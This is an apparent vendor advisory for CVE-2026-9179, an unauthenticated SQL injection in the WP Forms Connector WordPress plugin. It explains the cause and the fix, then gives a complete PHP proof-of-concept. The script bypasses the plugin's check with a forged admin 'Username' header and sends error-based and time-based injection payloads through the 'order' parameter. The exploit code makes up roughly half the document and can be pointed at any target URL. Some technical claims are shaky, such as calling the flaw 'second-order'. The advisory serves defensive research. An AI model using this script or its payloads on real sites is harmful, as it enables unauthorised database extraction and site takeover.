Atomic Edge analysis of CVE-2026-9179 (metadata-based): This vulnerability allows unauthenticated SQL injection in the WP Forms Connector plugin (version 1.8 and earlier) through the ‘order’ parameter in a REST API endpoint. The CVSS score is 7.5 (HIGH) with a confidentiality impact of HIGH and no impact on integrity or availability. The attacker requires no authentication and can exploit this remotely over the network with low complexity.
The root cause is a failure to sanitize and parameterize user input in the SQL query. The plugin reads the ‘order’ parameter directly from $_GET[‘order’] and concatenates it into an ORDER BY clause in the listPost() function. The description confirms insufficient escaping and lack of prepared statements ($wpdb->prepare() is not used). The permission_callback ‘__return_true’ means the REST endpoint exposes the function to anyone, and the broken authentication check only validates that a supplied ‘Username’ header corresponds to an admin account but never verifies the password. Based on the CWE (89) and the description, this is a classic second-order SQL injection where the attacker manipulates the ORDER BY clause to extract data via error-based or time-based techniques, though the CVSS suggests error or union-based extraction is possible.
To exploit, an attacker sends a GET request to the registered REST endpoint: /wp-json/wp/v3/post/list with an ‘order’ parameter containing a SQL injection payload. The order value is likely something like ‘ASC’ or ‘DESC’ expected by the query, but the attacker can replace it with malicious SQL. For example, the payload could be: id ASC; SELECT SLEEP(5) — to test time-based injection, or a UNION SELECT payload to extract user credentials. The broken authentication happens via a header-based check against the ‘Username’ header, but the ‘Password’ is never validated, so an attacker can simply provide any existing admin username to pass that broken check. The actual injection executes via $wpdb->get_results() with the concatenated ‘order’ value.
The remediation requires proper use of prepared statements for all database queries, specifically using $wpdb->prepare() for the ORDER BY clause. The plugin should also sanitize or whitelist the ‘order’ parameter to only allow known safe values like ‘ASC’, ‘DESC’, or specific column names. Additionally, the REST endpoint must have a proper authentication and authorization check, replacing the broken header-based check with a secure nonce or capability check. The permission_callback should verify that the user has proper capabilities (e.g., ‘edit_posts’), not simply return true.
The impact is severe: an unauthenticated attacker can extract all data from the WordPress database, including user credentials, password hashes, session tokens, private posts, configuration secrets, and potentially escalate to full site compromise. Since the attacker can append arbitrary SQL queries via ORDER BY-based injection, they can use UNION-based or error-based techniques to retrieve any table’s contents. This leads to complete disclosure of the database, which often contains sensitive information that can enable administrative access.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-9179 - WP Forms Connector <= 1.8 - Unauthenticated SQL Injection via 'order' Parameter
// Configuration: Set your target WordPress site URL
$target_url = 'http://example.com';
// The REST endpoint vulnerable to SQL injection
$endpoint = $target_url . '/wp-json/wp/v3/post/list';
// Step 1: Test if the endpoint is accessible without authentication (permission_callback '__return_true')
echo "[+] Testing REST endpoint accessibility...n";
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $endpoint,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HTTPHEADER => [
'Content-Type: application/json',
'Username: admin' // Broken auth: only username is validated, password never checked
],
CURLOPT_TIMEOUT => 10
]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code == 200) {
echo "[+] Endpoint accessible. Proceeding with SQL injection...n";
} else {
echo "[!] Endpoint returned HTTP $http_code. Maybe the plugin is patched or not installed.n";
exit;
}
// Step 2: Perform error-based SQL injection to extract MySQL version
// The 'order' parameter is concatenated directly into the ORDER BY clause.
// We assume the query is something like: SELECT * FROM wp_posts ORDER BY $order
// We inject a malicious ORDER BY with a subquery that causes an error revealing data.
echo "n[+] Attempting error-based SQL injection to extract MySQL version...n";
$payload = urlencode("id ASC,(SELECT 1 FROM (SELECT COUNT(*),CONCAT(0x5f,(SELECT VERSION()),0x5f,FLOOR(RAND()*2))a FROM information_schema.tables GROUP BY a)b)");
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $endpoint . '?order=' . $payload,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HTTPHEADER => [
'Username: admin' // Broken auth header
],
CURLOPT_TIMEOUT => 30
]);
$response = curl_exec($ch);
curl_close($ch);
echo "[+] Server response:n";
echo $response . "n";
// Step 3: Try a time-based blind injection to confirm SQL execution
// Payload: id ASC; SELECT IF(1=1,SLEEP(5),0) --
echo "n[+] Attempting time-based injection to confirm SQL execution...n";
$start = microtime(true);
$payload_time = urlencode("id ASC; SELECT IF(1=1,SLEEP(5),0)");
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $endpoint . '?order=' . $payload_time,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HTTPHEADER => [
'Username: admin'
],
CURLOPT_TIMEOUT => 10,
CURLOPT_CONNECTTIMEOUT => 5
]);
$response = curl_exec($ch);
$duration = microtime(true) - $start;
curl_close($ch);
echo "[+] Response time: " . round($duration, 2) . " secondsn";
if ($duration >= 3) {
echo "[+] Time delay confirmed: SQL injection is working!n";
} else {
echo "[!] No significant delay detected. Injection may require different syntax or target is not vulnerable.n";
}
echo "n[+] PoC completed. See output above for indicators of SQL injection.n";
?>
